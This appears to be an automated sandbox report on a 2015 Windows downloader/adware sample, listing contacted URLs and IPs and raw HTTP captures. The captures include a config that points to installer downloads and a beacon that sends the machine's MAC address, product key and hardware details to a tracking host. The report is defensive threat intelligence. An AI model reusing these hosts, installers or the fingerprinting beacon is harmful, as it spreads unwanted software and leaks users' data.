hxxp://aq8.cc/Public/bootstrap/3.3.5/js/bootstrap.min.js?1.0.247 | |
hxxp://aq8.cc/View/Home/Task//base.js?1.0.247 | |
hxxp://orp.n.shifen.com/query?cmd=url2finfo | |
hxxp://brwebapi.n.shifen.com/v1/t/full/p/mini/tn/10003408/ch_dl_url.exe | |
hxxp://down.qq.com/invc/xfspeed/qqpcmgr/download/QQPCDownload71960.exe | |
hxxp://download.suxiazai.com.gls.acadn.com/for_down/2013/install1393485.exe | 183.131.11.165 |
hxxp://mm.appkhh.com/mmliao/MM-liao8863.exe | 122.227.42.227 |
hxxp://203.205.148.185/dlied6.qq.com/invc/xfspeed/qqpcmgr/download/QQPCDownload71960.exe?mkey=563da3bbda60d437&f=1224&p=.exe | |
hxxp://js.users.51.la/17476535.js | 113.107.42.34 |
hxxp://brdlsw.jomodns.com/package/201511/7c9ddd8b4b286eef807bc97513948574.exe | |
hxxp://orp.n.shifen.com/query?cmd=validurl | |
hxxp://e6845.dscb1.akamaiedge.net/pca3-g5.crl | |
hxxp://orp.n.shifen.com/commit?cmd=finfo | |
hxxp://e6845.dscb1.akamaiedge.net/CSC3-2010.crl | |
hxxp://opt.xdwscache.ourwebpic.com/Opendownloadernewxml.aspx?softlist=&lmarkid=88 | |
hxxp://hk.mig.tencent-cloud.net/fcgi-bin/downurlquery?id=71960&guid=CQEjCF9zN8adOLEQHMvLiQgs3ZUZbbIyM0pyzn9CtE/lP8pJq+u226+i+UWFFd+D&ver=8.1.4016.301 | |
hxxp://opt.xdwscache.ourwebpic.com/temp/downloaderico/main.ico | |
hxxp://down.qq.com/invc/xfspeed/qqpcmgr/versetup/portal/PCMgr_Setup_10_9_16345_222.exe | |
hxxp://103.7.29.215/dlied6.qq.com/invc/xfspeed/qqpcmgr/versetup/portal/PCMgr_Setup_10_9_16345_222.exe?mkey=563da395da60d437&f=2384&p=.exe | |
hxxp://opt.xdwscache.ourwebpic.com/DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1276*846&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-02-CD-FB&HardDrive=00000000000000000001&CPU=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=88&Wmarkid=63&Mtype=19&tick=1446872431&flag=72ea6a2bb016edd8a444cdd51fccfdc2&status=1&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9 | |
hxxp://opt.xdwscache.ourwebpic.com/DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1276*846&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-02-CD-FB&HardDrive=00000000000000000001&CPU=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=88&Wmarkid=63&Mtype=19&tick=1446872435&flag=e96394f018d0f2b7394f88916459f7e4&status=2&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9 | |
hxxp://1st.dl.ourdvs.com/ktv/9158chat2_ktv088_63070700.exe | |
hxxp://opt.xdwscache.ourwebpic.com/Downloaderconfig.aspx?imgtype=9158 | |
hxxp://ui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined¶m=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028 | |
hxxp://imgcache.qq.com.cdngc.net/ptlogin/ver/10139/js/xui.js?v=10007 | 151.249.89.135 |
hxxp://imgcache.qq.com.cdngc.net/ptlogin/v4/style/0/images/icons.gif | 151.249.89.135 |
hxxp://opt.xdwscache.ourwebpic.com/temp/flash/1.swf | |
hxxp://ui.ptlogin2.qq.com/cgi-bin/report?id=89217 | |
hxxp://j.br.baidu.com/v1/t/full/p/mini/tn/10003408/ch_dl_url.exe | 111.206.37.114 |
hxxp://crl.verisign.com/pca3-g5.crl | 23.43.133.163 |
hxxp://imgcache.qq.com/ptlogin/ver/10139/js/xui.js?v=10007 | 151.249.89.135 |
hxxp://123.shipinbus.com/u.php?id=89 | 211.101.15.220 |
hxxp://dlied6.qq.com/invc/xfspeed/qqpcmgr/versetup/portal/PCMgr_Setup_10_9_16345_222.exe | 183.57.48.18 |
hxxp://dlied6.qq.com/invc/xfspeed/qqpcmgr/download/QQPCDownload71960.exe | 183.57.48.18 |
hxxp://tj.9158.com/DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1276*846&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-02-CD-FB&HardDrive=00000000000000000001&CPU=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=88&Wmarkid=63&Mtype=19&tick=1446872435&flag=e96394f018d0f2b7394f88916459f7e4&status=2&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9 | 87.245.198.83 |
hxxp://www.meiheitou.com/View/Home/Task/css.base.css?1.0.247 | 123.249.21.126 |
hxxp://www.meiheitou.com/?89-sd--ant- | 123.249.21.126 |
hxxp://www.meiheitou.com/Public/bootstrap/3.3.5/fonts/glyphicons-halflings-regular.eot? | 123.249.21.126 |
hxxp://www.meiheitou.com/Public/jquery/1.11.3/jquery.min.js?1.0.247 | 123.249.21.126 |
hxxp://csc3-2010-crl.verisign.com/CSC3-2010.crl | 23.43.133.163 |
hxxp://tj.9158.com/Opendownloadernewxml.aspx?softlist=&lmarkid=88 | 87.245.198.83 |
hxxp://cdn.daicuo.cc/dc.base/1.0.3/css/base.min.css?1.0.247 | 58.215.177.195 |
hxxp://tj.9158.com/Downloaderconfig.aspx?imgtype=9158 | 87.245.198.83 |
hxxp://17990.vicp.net/1/aHR0cDovLzEyMy5zaGlwaW5idXMuY29tL3UucGhwP2lkPTg5 | 119.28.13.101 |
hxxp://tj.9158.com/DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1276*846&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-02-CD-FB&HardDrive=00000000000000000001&CPU=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=88&Wmarkid=63&Mtype=19&tick=1446872431&flag=72ea6a2bb016edd8a444cdd51fccfdc2&status=1&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9 | 87.245.198.83 |
hxxp://dlsw.br.baidu.com/package/201511/7c9ddd8b4b286eef807bc97513948574.exe | 118.123.210.46 |
hxxp://tj.9158.com/temp/downloaderico/main.ico | 87.245.198.83 |
hxxp://www.meiheitou.com/Public/html5shiv/3.7.2/html5shiv.min.js | 123.249.21.126 |
hxxp://www.meiheitou.com/Public/images/sns_qq.png | 123.249.21.126 |
hxxp://download.suxiazai.com/for_down/2013/install1393485.exe | 183.131.11.165 |
hxxp://www.meiheitou.com/Public/bootstrap/3.3.5/js/bootstrap.min.js?1.0.247 | 123.249.21.126 |
hxxp://www.meiheitou.com/View/Home/Task/css.task.css?1.0.247 | 123.249.21.126 |
hxxp://conf.a101.cc/tool/install.txt | 211.101.15.220 |
hxxp://c.pc.qq.com/fcgi-bin/downurlquery?id=71960&guid=CQEjCF9zN8adOLEQHMvLiQgs3ZUZbbIyM0pyzn9CtE/lP8pJq+u226+i+UWFFd+D&ver=8.1.4016.301 | 103.7.30.157 |
hxxp://www.meiheitou.com/Public/bootstrap/3.3.5/css/bootstrap.min.css?1.0.247 | 123.249.21.126 |
hxxp://www.meiheitou.com/View/Home/Task//base.js?1.0.247 | 123.249.21.126 |
hxxp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined¶m=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028 | 112.90.83.106 |
hxxp://www.meiheitou.com/Public/respond/1.4.2/respond.min.js | 123.249.21.126 |
hxxp://imgcache.qq.com/ptlogin/v4/style/0/images/icons.gif | 151.249.89.135 |
hxxp://at.alicdn.com/t/font_1415073294_4967172.eot? | 188.254.86.250 |
acc.p2sp.baidu.com | 123.125.113.35 |
jh.01lm.com | 87.245.198.75 |
web2.51.la | 222.187.225.123 |
cmp2s.p2sp.baidu.com | 123.125.65.117 |
s.p2sp.baidu.com | 123.125.113.30 |
master.etl.desktop.qq.com | 140.207.69.49 |
stat.p2sp.baidu.com | 61.135.162.189 |
down.appkhh.com | 222.186.129.21 |
media.p2sp.baidu.com | 220.181.57.155 |
acctrack.kuaibo.com | 115.231.216.36 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 131
Connection: Keep-Alive
.#4H.......W.>...............................................................frrfaa)vyyifk.!k.f|.{tr8IHJXXriqLNCG......OSI-./012345
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00008542120341062666110713
Server: Apache
tracecode: 00008542120341062666110713
Set-Cookie: BAIDUID=32F3C5706F8B2402545910D9A50FD25A:FG=1; expires=Sun, 06-Nov-16 05:00:00 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
POST /query?cmd=validurl HTTP/1.1
Content-Length: 114
Connection: Keep-Alive
.#4H.......F..>.............................#.)* DYZ
..W[BX[WX^.OHFV!;#*j&)*g/%9.)!8>~`cefy>6*.:01olYRV[QK..ijkl
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00016772320341062666110713
Server: Apache
tracecode: 00016772320341062666110713
Set-Cookie: BAIDUID=69DAC83DF6D595A3CBDF2100CACB5A99:FG=1; expires=Sun, 06-Nov-16 05:00:01 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
GET /t/font_1415073294_4967172.eot? HTTP/1.1
Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: at.alicdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/octet-stream
Content-Length: 18124
Connection: keep-alive
Date: Fri, 07 Nov 2014 08:45:51 GMT
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=31557600
ETag: "FA439E838DACE2C479FFB8A09AA20DC4"
Last-Modified: Tue, 04 Nov 2014 03:54:54 GMT
x-oss-request-id: 545C86BFC642146A2828D1BE
Via: cache15.l2de1[0,200-0,H], cache9.l2de1[0,0], cache10.ru1[0,200-0,H], cache8.ru1[2,0]
Age: 31522441
X-Cache: HIT TCP_HIT dirn:9:460901958
X-Swift-SaveTime: Fri, 03 Apr 2015 19:31:55 GMT
X-Swift-CacheTime: 18818036
Timing-Allow-Origin: *
.F...E............................LP....@....................G......................i.c.o.n.f.o.n.t.....M.e.d.i.u.m.....V.e.r.s.i.o.n. .1...0. .;. .t.t.f.a.u.t.o.h.i.n.t. .(.v.0...9.4.). .-.l. .8. .-.r. .5.0. .-.G. .2.0.0. .-.x. .1.4. .-.w. .".G.". .-.f. .-.s.....i.c.o.n.f.o.n.t................pFFTMm9..........OS/2W.t........`cmap.......x....cvt ...J..;\...$fpgm0.....;.....gasp......;T....glyf"qw.......3.head..@p..6....6hhea...@..6....$hmtxSW....7 ...lloca.<....7....@maxp...u..7.... name......7.....post......:....8prep...f..E..............=.......}.......}.............................3.....................@........PfEd...x...,.,.\.,................. .................................x...........x..""33DDUUffww.............x..""33DDUUffww..........................w.fs..........................................................................................................................................................................................................................................................................................................."...2.......)@&.......W.....K....O.....C............. 3.!.'3.#"........V".f.....,.........0.:.R.^.wK..PX@J........f......^.....\.......^.......^....i........X.........Y.....Q.....B.K..PX@K........f......^.....\........f.......^....i........X.........Y.....Q.....B.K..PX@L........f......^.....\........f........f....i........X.........Y.....Q.....B.@N........f.......f......d........f........f....i........X.........Y.....Q.....BYYY@(SS;;21..S^S^[X;R;RKC751:2
<<< skipped >>>
GET /pca3-g5.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Server: Apache
ETag: "2235a72ff18d351e39c5c63221752775:1442874344"
Last-Modified: Mon, 21 Sep 2015 22:25:43 GMT
Date: Sat, 07 Nov 2015 05:00:11 GMT
Content-Length: 533
Connection: keep-alive
Content-Type: application/pkix-crl
0...0..0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1(c) 2006 VeriSign, Inc. - For authorized use only1E0C..U...<VeriSign Class 3 Public Primary Certification Authority - G5..150917000000Z..151231235959Z0...*.H................v'....{....."W*<../w...Bj.....H......ll..%..Y&.HtQ...}...F.{>..3.[..z.H...W../.3.Y.C.t....S{^.A.....G...^...YI.[..N.y..........p.....;....x6z..i7..0...lS$..h.#.9%[.,.1..1....3.....h;<...........W%....doi~..e6G........w........{c..............j.Em.....i.HTTP/1.1 200 OK..Server: Apache..ETag: "2235a72ff18d351e39c5c63221752775:1442874344"..Last-Modified: Mon, 21 Sep 2015 22:25:43 GMT..Date: Sat, 07 Nov 2015 05:00:11 GMT..Content-Length: 533..Connection: keep-alive..Content-Type: application/pkix-crl..0...0..0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1(c) 2006 VeriSign, Inc. - For authorized use only1E0C..U...<VeriSign Class 3 Public Primary Certification Authority - G5..150917000000Z..151231235959Z0...*.H................v'....{....."W*<../w...Bj.....H......ll..%..Y&.HtQ...}...F.{>..3.[..z.H...W../.3.Y.C.t....S{^.A.....G...^...YI.[..N.y..........p.....;....x6z..i7..0...lS$..h.#.9%[.,.1..1....3.....h;<...........W%....doi~..e6G........w........{c..............j.Em.....i...
<<< skipped >>>
POST /query?cmd=validurl HTTP/1.1
Content-Length: 96
Connection: Keep-Alive
.#4H.......4.`d.............................8.>?@)674.ih%$d*<=%'8.1<9z;:40;4s..r..\]PTF..lmno
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:11 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00117694860581376522110713
Server: Apache
tracecode: 00117694860581376522110713
Set-Cookie: BAIDUID=2C7B1E2C3C0DA057D1ED518AD3390542:FG=1; expires=Sun, 06-Nov-16 05:00:11 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..
GET /dlied6.qq.com/invc/xfspeed/qqpcmgr/download/QQPCDownload71960.exe?mkey=563da3bbda60d437&f=1224&p=.exe HTTP/1.1
Host: 203.205.148.185
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: CDN_NWS_4.2.1
Connection: keep-alive
Date: Sat, 07 Nov 2015 04:59:59 GMT
Cache-Control: max-age=600
Expires: Sat, 07 Nov 2015 05:09:59 GMT
Last-Modified: Wed, 13 May 2015 09:18:00 GMT
Content-Type: application/octet-stream
Content-Length: 1489144
X-Cache-Lookup: Hit From Disktank
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0A..t ..t ..t ......u ..S...m ..S.... ..S...0 .../..u .../..e ..t ... ..S...) ..S...u ..S...u ..Richt ..........PE..L....P.......................`....................@.............................................................................x....@.. O..............`...........................................`V..@...............$............................text...1........................... ..`.rdata..N...........................@..@.data....n.......0..................@....rsrc... O...@...P..................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
<<< skipped >>>
GET /u.php?id=89 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 123.shipinbus.com
Connection: Keep-Alive
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Sat, 07 Nov 2015 12:58:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.28
Location: hXXp://VVV.meiheitou.com/?89-sd--ant-
0..HTTP/1.1 302 Moved Temporarily..Server: nginx..Date: Sat, 07 Nov 2015 12:58:49 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.28..Location: hXXp://www.meiheitou.com/?89-sd--ant-..0..
GET /cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined¶m=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xui.ptlogin2.qq.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: keep-alive
Keep-Alive: timeout=50, max=1024
Server: QZHTTP-2.38.20
Date: Sat, 07 Nov 2015 05:00:29 GMT
P3P: CP="CAO PSA OUR"
Cache-Control: max-age=604800
Set-Cookie: pt_local_token=-1924241393; PATH=/; DOMAIN=ptlogin2.qq.com;
Last-Modified: Thu, 08 Mar 2012 02:04:00 GMT
Content-type: text/html
Content-Length: 5460
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="hXXp://VVV.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><style type="text/css">u{text-decoration:none}body{font-family:Tahoma,Verdana,Arial,......;font-size:12px;margin:0}.clear{clear:both;font-size:0;line-height:0;height:0}#login{margin:0 auto;float:none;width:320px;padding:0 0 10px 50px}.linemid{padding:10px 8px 0 30px;color:gray}.btn_select,.btn_gray{border:0;color:#2473a2;width:103px;height:28px;padding-left:2px;cursor:pointer;font-weight:bold;font-size:14px}.btn_select{background:url(hXXp://imgcache.qq.com/ptlogin/v4/style/0/images/icons.gif) no-repeat -102px -130px}.btn_gray{background:url(hXXp://imgcache.qq.com/ptlogin/v4/style/0/images/icons.gif) no-repeat -102px -225px}#login #list_uin img{padding:7px;background:url(hXXp://imgcache.qq.com/ptlogin/v4/style/0/images/icons.gif) no-repeat 0 -329px}#list_uin li{list-style:none;padding:0 0 0 28px; padding-left:12px;width:270px;word-wrap:break-word;min-height:20px;clear:both}#list_uin li input{float:left;margin-bottom:5px;width:20px}#list_uin label{margin:2px 0 0 4px;float:left;width:220px}#login p{padding:8px 15px 12px 32px;margin:0;font-size:12px;color:#535353}.x_lowLogin{padding:10px 0 0 28px;display:none}</style><script>var g_begTime=new Date();..(function(){...window.onerror = function(msg,url,line){....var reportUrl = location.protoco
<<< skipped >>>
GET /Downloaderconfig.aspx?imgtype=9158 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: tj.9158.com
Connection: Keep-Alive
Cookie: ASP.NET_SessionId=beuqcy55mosfikmv0ucgxk55
HTTP/1.1 200 OK
Date: Sat, 07 Nov 2015 05:00:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 948
X-Via: 1.1 db76:2 (Cdn Cache Server V2.0)
Connection: keep-alive
..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml" >..<head><title>.................</title></head>..<body style=" margin:0px">.. <form name="form1" method="post" action="Downloaderconfig.aspx?imgtype=9158" id="form1">..<div>..<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJOTU4MjMyMzI1ZGTU5ZBXmwe1gDNP/W SPke44 A65Q==" />..</div>..<div>...<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="91FFCAD5" />..</div>.. <div>.. .. <object >.. .. <embed src="http://tj.9158.com/temp/flash/1.swf" width="490px" height="180px" quality="high" pluginspage="hXXp://VVV.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" wmode="transparent" ></embed>.. </object>.. .. </div>.. </form>..</body>..</html>....
GET /Opendownloadernewxml.aspx?softlist=&lmarkid=88 HTTP/1.1
User-Agent: DownloadInstall
Host: tj.9158.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 07 Nov 2015 05:00:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=beuqcy55mosfikmv0ucgxk55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=gb2312
Content-Length: 899
X-Via: 1.1 db76:2 (Cdn Cache Server V2.0)
Connection: keep-alive
<?xml version="1.0" encoding="GB2312"?>..<config>...<Title>..........9158ktv</Title>...<XieyiUrl>hXXp://tj.9158.com/temp/provision/9158ktv.htm</XieyiUrl>...<AdvertUrl>http://tj.9158.com/Downloaderconfig.aspx?imgtype=9158</AdvertUrl>...<DownloadUrl>hXXp://jh.01lm.com/ktv/</DownloadUrl>...<ProExe>9158chat2_ktv0{0}_{1}.exe</ProExe>...<Icon>http://tj.9158.com/temp/downloaderico/main.ico</Icon>...<IconTips>hXXp://tj.9158.com/temp/files/IconToolTip.exe</IconTips>...<Setuptime>20</Setuptime>...<ToolIcon>9158........</ToolIcon>...<Item>9158ktv</Item>...<Mtype>19</Mtype>...<ErrorUrl>hXXp://down.cncpa.net:9000/h003/index.html</ErrorUrl>...<check>....<visible>1</visible>....<choice>1</choice>....<checkName>........</checkName>....<downUrl></downUrl>...</check>...<check>....<visible>1</visible>....<choice>1</choice>....<checkName>........</checkName>....<downUrl></downUrl>...</check>..</config>......
<<< skipped >>>
GET /temp/downloaderico/main.ico HTTP/1.1
User-Agent: DownloadInstall
Host: tj.9158.com
Cookie: ASP.NET_SessionId=beuqcy55mosfikmv0ucgxk55
HTTP/1.1 200 OK
Date: Sat, 07 Nov 2015 05:00:17 GMT
Content-Length: 17542
Content-Type: image/x-icon
Last-Modified: Tue, 03 Sep 2013 15:03:34 GMT
Accept-Ranges: bytes
ETag: "c2a0b8c2b6a8ce1:6d64"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Via: 1.1 fuzhou183:8111 (Cdn Cache Server V2.0), 1.1 db77:10 (Cdn Cache Server V2.0)
Connection: keep-alive
............ .h...F......... ......... .... .....6...00.... ..%......(....... ..... .........................p^...g...j..vT..vR...`...j...e..uH..vH...d...c...U..k?..eA..lU.*.g...........}...j...q...........]...c...........]..|P..qF..nL...d...............{...t...........m...u.......e...v...}......tK..z^...z...............}......D....h...p...d..xF...............^..x]...q...}..................C...c@...........................Q...n.......x...w..........X%...u..D....o...................p..f=...m...............k...k..W...l(..O...F................n..~]..lH...a...~...................o...p..g...O....|...............z..uT..vS..._...d...c...l..............\...]....................s..nO...^...u.......................m..X....M...............v..{a..dF...f...................]...]..c...R...o8...................{..qR...^...z.......]..............m1..L....c......................vX..wO...p......................Z...g/.......................t..rS..sI...........................i...........................v..hG..tK...f...........~.......................................d.._?..o\..pB..~D...C...D...M...N...L...N...R...Q...L...M..}K..iC..nX.'................................................................(.......0..... .............................p].4{c...g..uS..sO..sN..sM...d...d...c...]..qD..qD..rD..._...^...^...\..m@..g>..gF..mX.R....o].(.h...w.......z...a..._...]...s...|...z...v...S...R...X...u...t...t...c..yJ..qD..f:..d>..oZ.Myb...w...............|...n...l...v...............a..._...l..............._...W..}Q..uJ..vL..mM..y_..
<<< skipped >>>
GET /DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1276*846&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-02-CD-FB&HardDrive=00000000000000000001&CPU=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=88&Wmarkid=63&Mtype=19&tick=1446872431&flag=72ea6a2bb016edd8a444cdd51fccfdc2&status=1&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9 HTTP/1.1
User-Agent: DownloadInstall
Host: tj.9158.com
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=beuqcy55mosfikmv0ucgxk55
HTTP/1.1 200 OK
Date: Sat, 07 Nov 2015 05:00:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1134
X-Via: 1.1 db76:2 (Cdn Cache Server V2.0)
Connection: keep-alive
..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml" >..<head><title>.................</title></head>..<body>.. <form name="form1" method="post" action="DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1276*846&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-02-CD-FB&HardDrive=00000000000000000001&CPU=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=88&Wmarkid=63&Mtype=19&tick=1446872431&flag=72ea6a2bb016edd8a444cdd51fccfdc2&status=1&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9" id="form1">..<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNzgzNDMwNTMzZGSnkXrJ7Bg7YIIyJXb iSnRqd8R7Q==" />..<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="05019BFC" />.. <div style="text-align:center">.. <img title="webgo".. </div>.. </form>..</body>..</html>......
GET /DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1276*846&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-02-CD-FB&HardDrive=00000000000000000001&CPU=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=88&Wmarkid=63&Mtype=19&tick=1446872435&flag=e96394f018d0f2b7394f88916459f7e4&status=2&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9 HTTP/1.1
User-Agent: DownloadInstall
Host: tj.9158.com
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=beuqcy55mosfikmv0ucgxk55
HTTP/1.1 200 OK
Date: Sat, 07 Nov 2015 05:00:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1134
X-Via: 1.1 db76:2 (Cdn Cache Server V2.0)
